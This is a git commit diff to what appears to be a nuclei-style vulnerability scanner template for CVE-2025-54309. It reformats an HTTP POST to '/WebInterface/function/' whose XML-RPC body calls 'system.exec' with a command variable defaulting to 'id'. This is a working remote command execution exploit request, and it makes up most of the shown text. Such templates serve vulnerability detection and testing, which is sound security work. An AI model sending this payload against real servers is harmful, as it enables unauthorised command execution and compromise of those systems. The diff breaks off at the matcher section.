Update CVE-2025-54309.yaml

Co-authored-by: Chris <95527687+darses@users.noreply.github.com>
This commit is contained in:
Dhiyaneshwaran
2025-07-27 23:37:35 +05:30
committed by GitHub
parent 0d621a094b
commit 7ab25befca

View File

@@ -48,25 +48,25 @@ variables:
cmd: "id"
http:
- raw:
- |
POST /WebInterface/function/ HTTP/1.1
Host: {{Hostname}}
User-Agent: CrushExploit/2.0
Accept: */*
Content-Type: application/xml
<?xml version="1.0"?>
<methodCall>
<methodName>system.exec</methodName>
<params>
<param>
<value>
<string>{{cmd}}</string>
</value>
</param>
</params>
</methodCall>
- method: POST
path:
- "{{BaseURL}}/WebInterface/function/"
headers:
Content-Type: application/xml
body: |
<?xml version="1.0"?>
<methodCall>
<methodName>system.exec</methodName>
<params>
<param>
<value>
<string>{{cmd}}</string>
</value>
</param>
</params>
</methodCall>
matchers-condition: and
matchers: